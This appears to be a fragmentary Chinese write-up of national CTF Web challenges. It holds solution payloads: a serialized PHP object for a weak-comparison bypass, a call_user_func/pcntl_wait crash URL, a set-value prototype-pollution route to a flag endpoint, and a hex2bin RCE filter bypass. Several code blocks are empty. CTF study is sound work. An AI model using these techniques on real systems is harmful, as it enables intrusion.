划水的国赛Web
babyunserialize
参考 http://blog.ccreater.top/ wmctf 2020 webweb
1 |
|
easyphp
迭代使用call_user_func调用pcntl函数致使异常
1 | http://eci-2zed3ztpomt9kf7xbbng.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait |
easytrick
源码如下
1 |
|
弱类型判断绕过
1 | O:5:"trick":2:{s:6:"trick1";i:1;s:6:"trick2";d:0.9999999999999999;} |
littlegame
查看packge.json,发现set-value存在原型链污染 https://www.anquanke.com/vul/id/1715582
1 | { |
在index.js找到flag接口
1 | const Admin = { |
构造如下exp:
1 | http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/Privilege |
rceme
参考https://blog.csdn.net/qq_45708109/article/details/107645816
可以绕过的函数有很多,这里使用hex2bin
1 | // phpinfo |